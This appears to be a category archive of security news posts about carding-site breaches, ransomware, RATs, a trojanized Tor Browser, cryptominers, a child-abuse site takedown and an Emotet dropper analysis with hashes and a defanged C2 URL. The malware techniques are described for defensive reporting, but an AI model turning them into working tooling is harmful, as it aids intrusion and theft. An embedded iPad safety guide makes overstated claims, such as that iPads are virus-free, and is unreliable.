Category Archives: cyber crime

Hackers stole card details from BriansClub carding site

BriansClub, one of the biggest a dark web “carding store,” which specializes in the sale of stolen payment card data, has been hacked. 

Hackers have breached BriansClub (BriansClub[.]at), one of the biggest black market sites, that specializes in the sale of stolen credit card data. According to the security experts Brian Krebs, who first reported the data breach, the hackers stole data of more than 26 million payment cards.

Experts estimate the total number of stolen cards leaked from BriansClub represent almost 30 percent of the cards available on the black market.

““BriansClub,” one of the largest underground stores for buying stolen credit card data, has itself been hacked.” reads the post published by Brian Krebs. “The data stolen from BriansClub encompasses more than 26 million credit and debit card records taken from hacked online and brick-and-mortar retailers over the past four years, including almost eight million records uploaded to the shop in 2019 alone.”

Krebs reported that last month, a source shared with him, a file containing the full BriansClub database, the archive included cards currently available for sale and historically data.

The file contains details stolen from bricks-and-mortar retailers over the past four years, including nearly eight million records that were uploaded in 2019 alone.

People who reviewed the stolen data confirmed that the same credit card records could be found in a more redacted form by searching the BriansClub Web site using a valid and funded account.

Historical data in the archive show the rapid growth of the carding site, in 2015 the platform added just 1.7 million card records for sale, in 2016, 2.89 million stolen cards, 4.9 million cards in 2017; and 9.2 million in 2018. Between January and August 2019, BriansClub added approximately 7.6 million cards.

BriansClub acts as a broker of card data stolen by other cyber criminals, resellers or affiliates, who earn a fee from each sale.

BriansClub sold roughly 9.1 million stolen credit cards, allowing the site and its resellers to earn a total of $126 million in sales since 2015.

“There’s no easy way to tell how many of the 26 million or so cards for sale at BriansClub are still valid, but the closest approximation of that — how many unsold cards have expiration dates in the future — indicates more than 14 million of them could still be valid.” states Krebs.

According to a follow-up post published by Krebs, the administrator of BriansClub confirmed that the data center hosting his site had been hacked earlier in the year. The administrator claims that stolen data had been removed from BriansClub store inventories, but multiple sources confirmed they are still available for sale at BriansClub.

According to Krebs, the administrator of the Russian cybercrime forum Verified, BriansClub was hacked by “a fairly established ne’er-do-well who uses the nickname ‘MrGreen’ and runs a competing card shop by the same name.”

“The Verified site admin said MrGreen had been banned from the forum, and added that “sending anything to Krebs is the lowest of all lows” among accomplished and self-respecting cybercriminals. I’ll take that as a compliment.” concludes Krebs.

That said, if the remainder of BriansClub’s competitors want to use me to take down the rest of the carding market, I’m totally fine with that.”

Pierluigi Paganini

(SecurityAffairs – BriansClub, carding)

The post Hackers stole card details from BriansClub carding site appeared first on Security Affairs.

TA505 cybercrime group use SDBbot RAT in recent campaigns

TA505 cybercrime group that operated the Dridex Trojan and Locky ransomware, has been using a new RAT dubbed SDBbot in recent attacks.

Security experts at Proofpoint observed the notorious TA505 cybercrime group that has been using a new RAT dubbed SDBbot in recent attacks.

The TA505 group, that is known to have operated both the Dridex and Locky malware families, continues to make small changes to its operations. TA505 hacking group has been active since 2014 focusing on Retail and banking sectors.

SDBbot is a backdoor that is delivered via a new downloader dubbed Get2 that was written in C++. The dropper was also used to distribute other payloads, including FlawedGrace, FlawedAmmyy, and Snatch.

The new downloader Get2 was first observed in early September when the groups used it in targeted attacks against financial institutions in Greece, Singapore, United Arab Emirates, Georgia, Sweden, Lithuania, and a few other countries.

On September 20, new phishing attacks involved thousands of emails, with English and French lures, attempting to deliver Microsoft Excel and .ISO attachments to targets in the United States and Canada.

The TA505 group started delivering SDBbot in early October, it used weaponized Microsoft Office documents leveraging the Get2 downloader.

“On October 7, instead of directly attached malicious Microsoft Excel files, Proofpoint researchers observed thousands of emails containing URL shortener links redirecting to a landing page that in turn links to an Excel sheet “request[.]xls”. This campaign only used the English language and targeted companies from various industries primarily in the United States.” reads the analysis published by Proofpoint.


SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence.

The attackers switched from attachments to shortened URLs that point to a malicious Excel sheet, the attacks mainly targeted organizations in the United States.

Experts discovered that the Get2 downloader also implements information-gathering capabilities. It collects basic system information and sends it back to an hardcoded C&C via an HTTP POST request.

The SDBbot RAT has three main components, an installer, a loader, and a backdoor component.

The installer is used to store the RAT in the registry and establish persistence for the loader, while if the bot is running with admin privileges on a Windows version newer than Windows 7, persistence is established using the registry “image file execution options” method. If the bot is running as admin on Windows XP or 7, persistence is established using application shimming

“All three of the persistence mechanisms require a reboot to take effect and there is no additional code to continue executing the loader and RAT components from the installer. Proofpoint researchers speculate that the reboot functionality in the Get2 downloader (described above) is used to continue SDBbot’s execution after installation in the TA505 campaigns.” continues the analysis.

The loader is used to execute the loader shellcode from the binary blob that is stored in the registry that decompresses the RAT and loads and executes a DLL.

The RAT component supports typical RAT functionalities, including command shell, video recording of the screen, remote desktop, port forwarding, and file system access.

“The new Get2 downloader, when combined with the SDBbot as its payload appears to be TA505’s latest trick (or treat) for the Fall of 2019,” Proofpoint concludes.

Pierluigi Paganini

(SecurityAffairs – SDBbot RAT, TA505)

The post TA505 cybercrime group use SDBbot RAT in recent campaigns appeared first on Security Affairs.

Security Affairs newsletter Round 236

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns
Alabama Hospital chain paid ransom to resume operations after ransomware attack
Charming Kitten Campaign involved new impersonation methods
Imperva explains how hackers stole AWS API Key and accessed to customer data
Is Emotet gang targeting companies with external SOC?
Privacy advocates criticize Apple for sharing some users browsing data with Tencent
Talos experts found 11 flaws in Schneider Electric Modicon Controllers
Click2Mail suffered a data breach that potentially impacts 200,000 registrants
Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack
sudo flaw allows any users to run commands as Root on Linux
Winnti Group was planning a devastating supply-chain attack against Asian manufacturer
Adobe out-of-band security updates address 82 flaws in 3 products
Approaching the Reverse Engineering of a RFID/NFC Vending Machine
Chinese-speaking cybercrime gang Rocke changes tactics
Signature update for Symantec Endpoint protection crashed many device
Critical and high-severity flaws addressed in Cisco Aironet APs
Cryptocurrency miners infected more than 50% of the European airport workstations
Graboid the first-ever Cryptojacking worm that targets Docker Hub
International operation dismantled largest Dark Web Child abuse site
M6 Group, largest France private multimedia group, hit by ransomware attack
China-linked cyberspies Turbine PANDA targeted aerospace firms for years
Pitney Bowes revealed that its systems were infected with Ryuk Ransomware
Researcher released PoC exploit code for CVE-2019-2215 Android zero-day flaw
Systems at Ingredients provider Ingredion infected with a Malware
Trojanized Tor Browser targets shoppers of Darknet black marketplaces
A critical Linux Wi-Fi bug could be exploited to fully compromise systems
Emsisoft released a free decryption tool for the STOP (Djvu) ransomware
Hundreds of millions of UC Browser Android Users Exposed to MiTM Attacks. Again.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post Security Affairs newsletter Round 236 appeared first on Security Affairs.

Emsisoft released a free decryption tool for the STOP (Djvu) ransomware

Emsisoft firm has released a new free decryption tool the STOP (Djvu) ransomware, in the last months the research team helped victims of many other threats.

STOP (Djvu) ransomware has 160 variants that infected more hundreds of thousands of victims worldwide. Experts estimated a total number of 460,000 victims, that makes this threat the most active and widespread ransomware today.

According to data included in Emsisoft Ransomware Statistics report for Q2 and Q3 2019, Djvu ransomware accounts for more than half of all the ransomware submissions throughout the world.

For the first time, a decryptor used a side-channel attack on the ransomware’s keystream.

“We’ll be breaking STOP’s encryption via a side-channel attack on the ransomware’s keystream. As far as we know, it’s the first time this method has been used to recover ransomware-encrypted files on such a large scale.” reads the post published by Emsisoft.

The Divu ransomware encrypts victim’s files with Salsa20, and appends one of dozens of extensions to filenames, such as “.djvu”, “.rumba”, “.radman”, “.gero”, etc.

The price of the private key and decrypt software is $980, victims can receive a 50% discount if they contact the crooks in the first 72 hours.

The Djvu ransomware is mainly delivered through key generators and cracks, experts pointed out that some versions of STOP also bundle additional malicious payloads, including password-stealers.

The decryptor released by Emsisoft can recover for free files encrypted by 148 of the 160 variants, this means that approximately 70% of victims will be able to recover their data. Unfortunately, currently it is not possible to decrypt files encrypted by the remaining 12 variants.

Below key findings shared by the company:

  • The tool will recover files encrypted by 148 of the 160 known STOP variants and will enable approximately 70% of victims to recover their data without paying the ransom.
  • STOP has claimed more victims than any other currently active ransomware: 116k confirmed and 460K estimated.
  • The encryption is being broken via a side-channel attack on the keystream. This will be the first time ransomware has been decrypted this way on such a large scale (as far as we know). 
  • Because of the number of victims, we will not be able to provide one-on-one help for those who need assistance using the tool. The volunteer community at Bleeping Computer has, however, agreed to act as an unofficial support channel for this tool and will be providing help to those who need it. We greatly appreciate their efforts and willingness to help. Some words from Bleeping Computer’s Lawrence Abrams are below. 

Download the STOP Djvu Decryptor here

Pierluigi Paganini

(SecurityAffairs – Djvu ransomware, malware)

The post Emsisoft released a free decryption tool for the STOP (Djvu) ransomware appeared first on Security Affairs.

Trojanized Tor Browser targets shoppers of Darknet black marketplaces

A tainted version of the Tor Browser is targeting dark web market shoppers to steal their cryptocurrency and gather information on their browsing activity.

A Trojanized version of the Tor Browser is targeting shoppers of black marketplaces in the dark web, threat actors aim to steal their cryptocurrency and gather information on their browsing activity.

At the time of writing, attackers have already stolen about $40,000 worth of Bitcoin through more than 860 transactions registered to three of the attackers’ wallets.

“Utilizing a trojanized version of an official Tor Browser package, the cybercriminals behind this campaign have been very successful – so far their accounts have had more than 500,000 views and they were able to steal US$40,000+ in bitcoins.” reads a post published by ESET.

The weaponized version of the Tor Browser is promoted on Pastebin as the Russian version of the popular software. The Pastebin posts advertise the version saying that it also includes an anti-captcha feature that allows users to speed-up the browsing activity.

The trojanized Tor browser variant is hosted on the following two domains created in 2014 that are designed to appear as the official Russian version of the software:

  • tor-browser[.]org
  • torproect[.]org (the URL is missing “j”)

Threat actors also optimized the posts promoting the malicious software to appear as top results for queries for drugs, censorship bypass, and Russian politicians.

Between 2017 and early 2018, crooks promoted the webpages of the trojanized Tor Browser using spam messages on multiple Russian forums.

The home page of both sites displays a warning to the visitors informing them that they have an outdated Tor Browser, even if the visitors are using the most up-to-date Tor Browser version.

Trojanized Tor browser

“Your anonymity is in danger! WARNING: Your Tor Browser is outdated. Click the button “Update” reads the English translations.

When the users click on the “Update Tor Browser” button, they are redirected to a second website that delivers a Windows installer.

“This trojanized Tor Browser is a fully functional application. In fact, it is based on Tor Browser 7.5, which was released in January 2018. Thus, non-technically-savvy people probably won’t notice any difference between the original version and the trojanized one.” continues the analysis.

“No changes were made to source code of the Tor Browser; all Windows binaries are exactly the same as in the original version. However, these criminals changed the default browser settings and some of the extensions.”

The Trojanized Tor Browser has disabled the update feature to prevent victims from updating to a non-tainted version, attackers also changed the default User-Agent to the unique hardcoded value that is used by threat actors as a fingerprint.

“The most important change is to the xpinstall.signatures.required settings, which disable a digital signature check for installed Tor Browser add-ons.” reads the post. “Therefore, the attackers can modify any add-on and it will be loaded by the browser without any complaint about it failing its digital signature check.”

Crooks also modified the HTTPS Everywhere add-on included with the browser to add a content script (script.js) that will be executed on load in the context of every webpage.

The JavaScript payload uses a standard webinject mechanism that allows stealing content in forms, hiding original content, showing fake messages, or adding its own content.

The only JavaScript payload observed by ESET was used to target visitors of three of the largest Russian-speaking darknet markets. This script attempts to alter QIWI (a popular Russian money transfer service) or bitcoin wallets located on pages of these markets.

Using this trick, attackers are able to hijack payments by changing the wallet address of the shoppers with the ones belonging to the attackers.

“As of this writing, the total amount of received funds for all three wallets is 4.8 bitcoin, which corresponds to over US$40,000. It should be noted that the real amount of stolen money is higher because the trojanized Tor Browser also alters QIWI wallets.” concludes ESET that also shared IoCs. “This trojanized Tor Browser is a non-typical form of malware, designed to steal digital currency from visitors to darknet markets. Criminals didn’t modify binary components of the Tor Browser; instead, they introduced changes to settings and the HTTPS Everywhere extension. This has allowed them to steal digital money, unnoticed, for years.”

Pierluigi Paganini

(SecurityAffairs – Trojanized Tor Browser, hacking)

The post Trojanized Tor Browser targets shoppers of Darknet black marketplaces appeared first on Security Affairs.

Pitney Bowes revealed that its systems were infected with Ryuk Ransomware

The global shipping and mailing services company Pitney Bowes revealed that the recent partial outage was caused by the Ryuk ransomware.

The global shipping and mailing services company Pitney Bowes recently suffered a partial outage of its service caused by a ransomware attack. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

The company now published an update on the attack, it confirmed that the root cause of the disruptions of its services was “the Ryuk virus malware attack.”

“This is an update to the status of Pitney Bowes recovery from the Ryuk virus malware attack on some of our systems that disrupted client access to some of our services.” reads the update shared by the company. “Upon discovery of the attack, with the support of third-party advisors, we immediately began working on a plan and thorough process of systems restoration with the goal of restoring service as quickly as possible. We have also been reaching out to our clients, partners, and employees.”

The mailing system products were paralyzed by the attack, the company confirmed that immediately after the attack the following systems were NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company announced that currently it has restored many of the impacted systems.

The Ryuk ransomware was involved in a long string of attacks targeting cities, hospitals, and organizations worldwide.

In September New Bedford city was infected with Ryuk ransomware, but did not pay $5.3M ransom. In April, systems at Stuart City were infected by the same Ryuk ransomware, in early March, Jackson County, Georgia, was hit by the same ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Pierluigi Paganini

(SecurityAffairs – Ryuk Ransomware, Pitney Bowes)

The post Pitney Bowes revealed that its systems were infected with Ryuk Ransomware appeared first on Security Affairs.

Cryptocurrency miners infected more than 50% of the European airport workstations

Researchers at Cyberbit spotted a crypto mining campaign that infected more than 50% of the European airport workstations. 

Security experts at Cyberbit have uncovered a crypto mining campaign that infected more than 50% of the European airport workstations. 

European airport systems were infected with a Monero cryptocurrency miner that was linked to the Anti-CoinMiner campaign discovered this summer by Zscaler researchers.  

“While rolling out Cyberbit’s  Endpoint Detection and Response (EDR) in an international airport in Europe, our researchers identified an interesting crypto mining infection, where cryptocurrency mining software was installed on more than 50% of the airport’s workstations.” reads the analysis published by Cyberbit.

Experts pointed out that the Monero miners were installed on the European airport systems, even if they were running an industry-standard antivirus. Threat actors were able to package the miner evading the detection of ordinary antivirus.

“The malware we found was first discovered by Zscaler more than a year ago,” continues Cyberbit. “It was modified just enough to evade the vast majority of existing signatures for it, with only 16 out of 73 detection products on VirusTotal detecting the sample as malicious.”

The good news is that the miner did not impact the airport’s operations.

Experts’ behavioral engine detected a suspicious usage of the PAExec tool used to execute an application named player.exe.

PAExec is a redistributable version of the legitimate Microsoft PSExec tool that is used to run Windows programs on remote systems without having to physically install software on them. The execution of the PAExec tool is often associated with an ongoing attack, in this case, hackers used it for to launch the Player executable “in system mode.”

Experts also observed the use of Reflective DLL Loading after running player.exe. The technique allows the attackers to remotely inject a DLL directly into a process in memory.

“This impacts the performance of other applications, as well as that of the airport facility. The use of administrative privileges also reduces the ability for security tools to detect the activity.” continues the report.

In order to gain persistence, attackers added an entry in the systems’ registries for the PAExec.

At the time, researchers were not able to determine how attackers infected the European Airport systems.

“Because the malware happened to be a cryptominer, its business impact was relatively minor, limited to performance degradations leading to quality of service and service interruptions, as well as a significant increase in power consumption throughout the airport.” concludes Cyberbit.

“In a worst-case scenario, attackers could have breached the IT network as a means to hop onto the airport’s OT network in order to compromise critical operational systems ranging from runway lights to baggage handling machines and the air-train, to name a few of the many standard airport OT systems that could be cyber-sabotaged to cause catastrophic physical damage,”

Pierluigi Paganini

(SecurityAffairs – European airport workstations, miner)

The post Cryptocurrency miners infected more than 50% of the European airport workstations appeared first on Security Affairs.

International operation dismantled largest Dark Web Child abuse site

The United States Department of Justice announced the arrest of hundreds of criminals as part of a global operation against a dark web child abuse community.

The US Department of Justice announced the arrest of hundreds of criminals as part of a global operation conducted against the crime community operating the largest dark web child porn site, ‘Welcome to Video’.

The operation involved law enforcement agencies from several countries, including the IRS-CI, the US Homeland Security Investigations, the NCA, the Korean National Police of the Republic of Korea, and German Federal Criminal Police (the Bundeskriminalamt), 

Officials have arrested the administrator of the site, Jong Woo Son of South Korea (23), along with 337 suspects in 38 countries that have been charged for allegedly being users of the site.

Two former federal law enforcement officials were allegedly involved in the child porn site, Paul Casey Whipple and Richard Nikolai Gratkowski.

The US authorities issued a warrant for Son’s arrest on February 2018, and South Korean police arrested the man on March 5, 2018, and seized the server used to operate Welcome To Video.

According to the indictment, the ‘Welcome to Video’ child abuse site was launched in June 2015 and operated until March 2018. The site received at least 420 BTC in three years through at least 7300 transactions.

Experts from the National Center for Missing and Exploited Children (NCMEC) are currently analyzing over 250,000 unique videos hosted on the website, 45 percent of them contain new images that have not been previously known to exist.

“According to the indictment, on March 5, 2018, agents from the IRS-CI, HSI, National Crime Agency in the United Kingdom, and Korean National Police in South Korea arrested Son and seized the server that he used to operate a Darknet market that exclusively advertised child sexual exploitation videos available for download by members of the site.” reads a press release published by the DoJ.  “The operation resulted in the seizure of approximately eight terabytes of child sexual exploitation videos, which is one of the largest seizures of its kind.”

The great news is that the operation allowed to rescue tens of children living in the United States, Spain, and the United Kingdom.

According to the indictment, the law enforcement experts discovered the Child abuse website was hosted on the IP address and that was registered by a provider in South Korea and were registered with an account serviced at the defiant’s home.

Experts also identified more than one million unique bitcoin addresses that were used to receive payments from the users of the website. Two users of the Darknet market committed suicide subsequent to the execution of search warrants.

“Welcome To Video offered these videos for sale using the cryptocurrency bitcoin.  Typically, sites of this kind give users a forum to trade in these depictions.  This Darknet website is among the first of its kind to monetize child exploitation videos using bitcoin.  In fact, the site itself boasted over one million downloads of child exploitation videos by users.  Each user received a unique bitcoin address when the user created an account on the website.” continues the press release. “An analysis of the server revealed that the website had more than one million bitcoin addresses, signifying that the website had capacity for at least one million users.”

Though Son is currently serving an 18-month sentence in South Korea, a federal grand jury in Washington DC unsealed a 9-count indictment against him just yesterday, with the U.S. authorities seeking his extradition to face justice.

Darknet sites that profit from the sexual exploitation of children are among the most vile and reprehensible forms of criminal behavior,” said Assistant Attorney General Brian A. Benczkowski of the Justice Department’s Criminal Division. “This Administration will not allow child predators to use lawless online spaces as a shield. Today’s announcement demonstrates that the Department of Justice remains firmly committed to working closely with our partners in South Korea and around the world to rescue child victims and bring to justice the perpetrators of these abhorrent crimes.”

Pierluigi Paganini

(SecurityAffairs – Child abuse, cybercrime)

The post International operation dismantled largest Dark Web Child abuse site appeared first on Security Affairs.

Checking for Malware on Your iPad

If you own a jailbreak-free iPad, you have the assurance that your device is virus-free. Moreover, you’re safe from any vital issues caused by malware because it doesn’t target iPads exclusively. On the other hand, you must still be watchful of some concerns that you’ll find out here.

Although a virus can’t wreak havoc to your iPad, some threats like malware exist. For one, phishing scams can fool you to provide your password on a fraudulent recovery page you received. Cybercriminals can send you messages, like the ones you receive on your computer, to your iPad.

Various methodologies can verify if it’s a phishing scam or adware, and you don’t need to buy them. Moreover, you can protect your device from these issues and avoid malware if you’ve jailbroken your iPad. We invite you to continue reading to understand how you can protect your table from malware and fraudulent advertisements. Also, we’ll tell you how to keep your electronic device safe.

Checking for Malware and Other Problems on Your iPad

You can find out if your iPad is a victim of a phishing scam or adware by examining the URL of the site you’re visiting on your web browser. If there are wrong spelling or many letters and numbers, you’re most probably visiting a scam page, so you must exit it immediately.

If you continue to receive messages that you have a virus or malware on your device, either through a page or in a pop-up ad, you must free the cache of your iPad. However, you must understand that you’re also clearing your saved passwords. This scenario is truly annoying, but you have no choice but to enter them again. You may avail of a password manager before you clear your cache, so you won’t encounter problems about re-saving them. You can return to your routine iPad use immediately.

After securing your passwords, you can now proceed to Settings and tap Safari. Then, you can rap on “Clear History and Website Data,” which you can find at the lower portion of the page, before finally tapping “Clear.” You won’t be receiving the virus or malware warning.

If you receive a weird email notification, you can verify the email address. Just like what we did with the webpage, the email address mustn’t contain any misspellings. Also, it must be the official email address of your subscription or account. You can report unauthorized email as a scam before deleting it from your inbox.

If you’ve jailbroken your iPad, you need to think about your recent downloads and answer these questions:

  • Did you download any apps outside of the app store?
  • Did you download an app from a company that you can’t verify?
  • Are you having issues with a specific app that acts oddly?

Most probably, your problem is with the app, so you must check the company’s social media pages for any announcements. Moreover, you must ensure that you have the latest version of the app. If you have an updated app and you can’t find any reported issue on social media, you can uninstall it. Then, you must verify if you’re still experiencing problems on your device. If your iPad works find, you’ve found your malefactor.

You may search for an alternative software for that function. If you’re still experiencing issues, you can check the other downloaded apps or files. You may try uninstalling each app to see if it fixes your problem. If you’re getting unreliable information from your iPad, you can check the tips we shared here. You can protect it, so you won’t have to face the same issue over and over again.

Protecting Your iPad

We discussed verifying email addresses and URLs in the previous section. You must do so before you provide information or click links. Aside from doing these things, you must ensure that you update your apps and iOS as needed. Apple and software developers offer updates from time to time to add security features or as direct responses to malicious codes and hacks. If you want to secure your iPad from phishing scams, malware, and adware, you must ensure that you keep abreast of software updates.

Moreover, you mustn’t jailbreak your device to make it repairable and safe. Many Apple Genius bars won’t help you if you’ve jailbroken your device. However, if you still decide to jailbreak your iPad, you must follow these safety precautions. First, you must avail of a VPN, so outsiders can’t target your device as you browse online. 

Furthermore, if you want to download apps, you must ensure that you do so from reputable developers. You can install anti-virus software to ensure that your iPad is more secure against any malicious attempts from hackers. This app can provide security like device wipe features, additional web protection, and remote locks. Often, restarting your device can reset your device if malicious apps have infiltrated it. Doing so also kicks out hackers who have accessed your iPad remotely. Also, periodic clearing of cache can flush out adware before it can trick you, or it becomes an annoyance.

Finally, you can protect your iPad through regular backups. You may back up so to your computer or cloud storage. This way, if a malware enters your system, you can merely restore your iPad to factory settings. Clean backups can prevent malicious malware infection, and you can have your device functioning sooner than expected.

iPads are safe from viruses and malware, but they can be vulnerable to a few attacks. If you know some essential information, you can keep your device safe. Moreover, you can protect it in advance by following the tips we provided.

Protecting Your iPhone from Viruses

Malware, viruses, and adware can be lurking in every corner of the Internet. Many users believe that their iPhone is safe from the influx of viruses because this information was public knowledge some years ago. However, this info isn’t accurate anymore; therefore, you must shield your iPad and iPhone from these malicious infections.

The post Checking for Malware on Your iPad appeared first on .

Chinese-speaking cybercrime gang Rocke changes tactics

Chinese-speaking cybercrime gang Rocke that carried out several large-scale cryptomining campaigns, has now using news tactics to evade detection.

Chinese-speaking cybercrime gang Rocke, that carried out several large-scale cryptomining campaigns in past, has now using news tactics to evade detection. The group has been observed using new tactics, techniques, and procedures (TTPs), it is also using updated malware to evade detection.

The cybercrime organization was first spotted in April 2018 by researchers at Cisco Talos, earlier 2019 researchers from Palo Alto Networks Unit42 found new malware samples used by the Rocke group for cryptojacking that uninstalls from Linux servers cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud.

In March, the group was using a dropper dubbed LSD that was controlled via Pastebin, but since this summer the threat actors have changed Command and Control (C2) infrastructure using a self-hosted solution.

The malicious code is used by the hackers to deliver a Moner (XMR) crypto miner that is not detected by almost any antivirus solution.

The Rocke group was also observed exploiting the CVE-2019-3396 flaw in Confluence servers to get remote code execution and deliver the miners.

“Rocke, a China-based cryptomining threat actor, has changed its Command and Control (C2) infrastructure away from Pastebin to a self-hosted solution during the summer of 2019.” reads the analysis published by the security firm Anomaly. “the actor moved away from hosting the scripts on dedicated servers and instead started to use Domain Name System (DNS) text records. These records are accessed via normal DNS queries or DNS-over-HTTPs (DoH) if the DNS query fails. In addition to the C2 change, functionality was also added to their LSD malware to exploit ActiveMQ servers vulnerable to CVE-2016-3088.”

The use of self-hosted and DNS records makes it hard to detect the group’s operations and takedowns. The new LSD sample was first spotted on September 17 as reported in the following graph.

The group also improved its LSD dropper by adding the malicious code to exploit CVE-2016-3088 in ActiveMQ servers.

In order to ensure that only its miner is running on the infected machine, the group attempt to kill any other processes with high CPU usage. The LSD malware analyzed the MD5 hash of the files to avoid killing its instance running on the system.

“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity,” concludes Anomali Labs.

“It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future.”

Technical details, including Indicators of Compromise, are reported in the analysis published by Anomali.

Pierluigi Paganini

(SecurityAffairs – Rocke cybercrime gang, miner)

The post Chinese-speaking cybercrime gang Rocke changes tactics appeared first on Security Affairs.

Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack

The global shipping and mailing services company Pitney Bowes suffered a partial outage of its service caused by a ransomware attack.

The Pitney Bowes company announced that a ransomware attack infected its systems and cause a partial system outage that made some of its service unavailable for some customers. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

“Pitney Bowes was affected by a malware attack that encrypted information on some systems and disrupted customer access to some of our services. At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” reads a press release published by the company.

“At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” 

The good news is that there is no evidence that hackers accessed company information. The company has hired an external security firm to support its investigation into the security breach.

The mailing system products were paralyzed by the attack, the company confirmed that the following systems are currently NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company pointed out that even is its customers will not be able to refill their postage meter until the systems are restored, that can will be able to print postage if they have funds.

Clients with Mail360 and MIPro Licensing products have no access to Your Account, Data fulfillment, and some of our Support pages, with Software and Data Marketplace downloads being unavailable.

For Commerce Services clients, impacted solutions include Fulfillment, Delivery and Returns clients and Presort services were impacted.

The Software and Data products are not affected by the ransomware attacks because they do not access the backend systems of the Pitney Bowes network.

Customers can visit the page to receive up to date information on the incident.

Pierluigi Paganini

(SecurityAffairs – Pitney Bowes, hacking)

The post Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack appeared first on Security Affairs.

Is Emotet gang targeting companies with external SOC?


The group behind Emotet malware is getting smarter and smarter in the way the deliver such a Malware. While the infection schema looks alike from years; the way the group tries to infect victims improves from day to day.
Today I’d like to share a quick analysis resulted by a very interesting email which claimed to deliver a SOC “weekly report” on the victim email. First of all the attacker knew the target organization was protected by a SOC (Security Operation Center) so she sent a well crafted email claiming to deliver a Microsoft document wrapping out the weekly SOC report as a normal activity in order to induce the victim to open-it.

SOC report 10 12 2019.doc ( 6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7 ) is the delivered file sent on Oct 11, 2019, 11:06:09 PM from I believe that is not a malicious domain but mostly a new compromised one.

Technical Analysis

ThreatWord document Dropper (Emotet)
Brief DescriptionFirst stage of Emotet campaign targeting organization with Security Operation Centers

Following the original eMail headers from to victim’s email box it is possible to figure-out the attacker used a SMPT client who left trace about the original sender IP address which happens to be: According to IPLocation that address is related to a very nice town in northern France: Thury-Harcourt, France.

Thury-Harcourt, France. Sender IP

The attached document is a well obfuscated Microsoft Word document which asks to enable macros in order to view its content. The autoopen function begins a complex obfuscated chain which tries to deter analyst by introducing junk code, junk variable assignments and fake apparent real comments. The following image proves the adopted obfuscation technique. The function c878cxx90590 is the “Real Code” by meaning is not part of junk code but actually is the function who really performs malicious actions. As you might see being in the middle of hundreds similar lines of code it gets hard to spot.

Obfuscated Macro

The obfuscated macro creates on-memory objects and runs them without passing through temporary files. The following image shows the auto-run created object before the Drop’n Execute. The analysed variable in the following image is the c0639047895c6 which, in that specific run, holds the Win32_ProcessStartup created Object for fulfill persistence on the victim machine.

Object Building

Once the dropper assured the persistence and to run during the start-up, it carves from itself the following powershell script. The script runs an encoded string hiding the dropping ULRs. The base64 decoded string shows a romantic foreach statement looping through a list of compromised websites hosting the real payload : de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216 (VT 6/69). It finally saves the dropped file in a userprofile location as placed in the variable xc0x57b38b2x7, before running it. The following image shows the powershell script before and after the encoding by giving a quick description on it.

Final Deobfuscated Dropper

According to VT, the final run looks like Emotet, a banking trojan who steals credentials, cookies and eCoin wallets. Emotet is also able to access to saved credentials of the major browser like Chromium, Firefox, Opera, Vivaldi to exfiltrate cookies, and to send back to command and control found victim information. But let’s try to quickly check it.

Analysis of dropped and executed file (emotet)

ThreatEmotet. Data Exfiltration
Brief DescriptionDropped and Executed by previous stage

The dropped file (VT 12/69), grabbed from the dropping URLs inside the previous powershell script, is an executable packed by internal functions which uses several techniques to avoid static and dynamic analysis. For example it deletes the original file once executed, it resolves an unusual very high number of APIs and it dynamically resolves functions avoiding static analysis.

Emotet Depacked

During the running phase the analyzed sample records many information on the hosting machine, it asks for local public IP address by querying an external resource: http[://185[.42[.221[.78:443/whoami.php and finally it pushes out those information to external Command and Control (please refer to IoC section for the complete C2 list).

Recorded Information

The sample starts a local service called khmerdefine and assures its persistence by adding that file in c:\Windows\SysWOW64 and setting up a system service in autorun. AV and plenty static traffic signatures confirm we are facing a new encrypted version of Emotet trojan.


Emotet gang is getting smarter and smarter in delivery artifacts. That time they addressed companies having an external Security Operation Center (SOC) pretending to simulate an external SOC operator who sends periodic reports to the company. The delivery content was a Microsoft word document within heavily obfuscated Macros who eventually drops and executes Emotet Malware. The following image represent the compiled MITRE ATT&CK matrix in order to qualify stages and to describe the overall behavior.




6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7 (.doc)
de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216 (.exe)

Drop URLs:

C2 (Emotet):

Yara Rules

      date = "2019-10-13"
      hash1 = "de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216"
